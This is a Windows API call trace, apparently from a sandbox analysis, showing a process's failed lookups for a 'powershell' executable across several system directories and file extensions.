	[0644.187] SetErrorMode (uMode=0x1) returned 0x1
	[0644.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.189] SetErrorMode (uMode=0x1) returned 0x1
	[0644.189] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.189] SetErrorMode (uMode=0x1) returned 0x1
	[0644.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.190] SetErrorMode (uMode=0x1) returned 0x1
	[0644.190] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.190] SetErrorMode (uMode=0x1) returned 0x1
	[0644.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.190] SetErrorMode (uMode=0x1) returned 0x1
	[0644.190] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.191] SetErrorMode (uMode=0x1) returned 0x1
	[0644.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.191] SetErrorMode (uMode=0x1) returned 0x1
	[0644.191] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.191] SetErrorMode (uMode=0x1) returned 0x1
	[0644.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.192] SetErrorMode (uMode=0x1) returned 0x1
	[0644.192] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.192] SetErrorMode (uMode=0x1) returned 0x1
	[0644.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.192] SetErrorMode (uMode=0x1) returned 0x1
	[0644.193] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.193] SetErrorMode (uMode=0x1) returned 0x1
	[0644.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.193] SetErrorMode (uMode=0x1) returned 0x1
	[0644.193] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.194] SetErrorMode (uMode=0x1) returned 0x1
	[0644.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.194] SetErrorMode (uMode=0x1) returned 0x1
	[0644.194] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.194] SetErrorMode (uMode=0x1) returned 0x1
	[0644.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.195] SetErrorMode (uMode=0x1) returned 0x1
	[0644.195] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.195] SetErrorMode (uMode=0x1) returned 0x1
	[0644.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.195] SetErrorMode (uMode=0x1) returned 0x1
	[0644.196] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.196] SetErrorMode (uMode=0x1) returned 0x1
	[0644.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.196] SetErrorMode (uMode=0x1) returned 0x1
	[0644.196] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.197] SetErrorMode (uMode=0x1) returned 0x1
	[0644.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.197] SetErrorMode (uMode=0x1) returned 0x1
	[0644.197] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.197] SetErrorMode (uMode=0x1) returned 0x1
	[0644.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.198] SetErrorMode (uMode=0x1) returned 0x1
	[0644.198] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.198] SetErrorMode (uMode=0x1) returned 0x1
	[0644.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.198] SetErrorMode (uMode=0x1) returned 0x1
	[0644.198] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.199] SetErrorMode (uMode=0x1) returned 0x1
	[0644.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0644.199] SetErrorMode (uMode=0x1) returned 0x1
	[0644.199] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.200] SetErrorMode (uMode=0x1) returned 0x1
	[0644.200] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0644.200] SetErrorMode (uMode=0x1) returned 0x1
	[0644.200] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.200] SetErrorMode (uMode=0x1) returned 0x1
	[0644.200] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0644.201] SetErrorMode (uMode=0x1) returned 0x1
	[0644.201] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.201] SetErrorMode (uMode=0x1) returned 0x1
	[0644.201] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0644.201] SetErrorMode (uMode=0x1) returned 0x1
	[0644.202] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.202] SetErrorMode (uMode=0x1) returned 0x1
	[0644.202] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0644.202] SetErrorMode (uMode=0x1) returned 0x1
	[0644.202] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.202] SetErrorMode (uMode=0x1) returned 0x1
	[0644.203] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0644.203] SetErrorMode (uMode=0x1) returned 0x1
	[0644.203] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.203] SetErrorMode (uMode=0x1) returned 0x1
	[0644.203] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0644.204] SetErrorMode (uMode=0x1) returned 0x1
	[0644.204] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.204] SetErrorMode (uMode=0x1) returned 0x1
	[0644.204] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0644.204] SetErrorMode (uMode=0x1) returned 0x1
	[0644.204] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0644.205] SetErrorMode (uMode=0x1) returned 0x1
	[0646.265] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0646.265] SetErrorMode (uMode=0x1) returned 0x1
	[0646.265] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.265] SetErrorMode (uMode=0x1) returned 0x1
	[0646.266] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0646.266] SetErrorMode (uMode=0x1) returned 0x1
	[0646.266] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.266] SetErrorMode (uMode=0x1) returned 0x1
	[0646.266] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0646.266] SetErrorMode (uMode=0x1) returned 0x1
	[0646.266] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.267] SetErrorMode (uMode=0x1) returned 0x1
	[0646.267] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0646.267] SetErrorMode (uMode=0x1) returned 0x1
	[0646.267] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.267] SetErrorMode (uMode=0x1) returned 0x1
	[0646.268] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0646.268] SetErrorMode (uMode=0x1) returned 0x1
	[0646.268] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.268] SetErrorMode (uMode=0x1) returned 0x1
	[0646.268] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0646.268] SetErrorMode (uMode=0x1) returned 0x1
	[0646.269] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.269] SetErrorMode (uMode=0x1) returned 0x1
	[0646.269] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0646.269] SetErrorMode (uMode=0x1) returned 0x1
	[0646.269] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.269] SetErrorMode (uMode=0x1) returned 0x1
	[0646.270] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0646.270] SetErrorMode (uMode=0x1) returned 0x1
	[0646.270] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.270] SetErrorMode (uMode=0x1) returned 0x1
	[0646.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c5fdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0646.271] SetErrorMode (uMode=0x1) returned 0x1
	[0646.271] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c5fdea0 | out: lpFindFileData=0x1c5fdea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0646.271] SetErrorMode (uMode=0x1) returned 0x1
